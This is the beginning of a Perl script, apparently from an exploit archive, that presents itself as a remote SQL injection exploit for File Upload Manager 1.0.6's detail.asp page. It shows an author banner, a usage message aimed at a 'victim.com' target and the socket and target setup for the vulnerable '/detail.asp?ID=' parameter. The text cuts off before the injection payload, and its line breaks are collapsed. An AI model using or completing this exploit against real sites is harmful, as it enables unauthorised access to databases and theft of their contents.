#!/usr/bin/perl #[Script Name: File Upload Manager <= 1.0.6 (detail.asp) Remote SQL Injection Exploit #[Coded by : ajann #[Author : ajann #[Contact : :( #[S.Page : http://www.mxmania.net #[$$ : 29.99 . #[.. : ajann,Turkey use IO::Socket; if(@ARGV < 1){ print " [======================================================================== [// File Upload Manager <= 1.0.6 (detail.asp) Remote SQL Injection Exploit [// Usage: exploit.pl [target] [// Example: exploit.pl victim.com [// Example: exploit.pl victim.com [// Vuln&Exp : ajann [======================================================================== "; exit(); } #Local variables $server = $ARGV[0]; $server =~ s/(http:\/\/)//eg; $host = "http://".$server; $port = "80"; $file = "/detail.asp?ID="; print "Script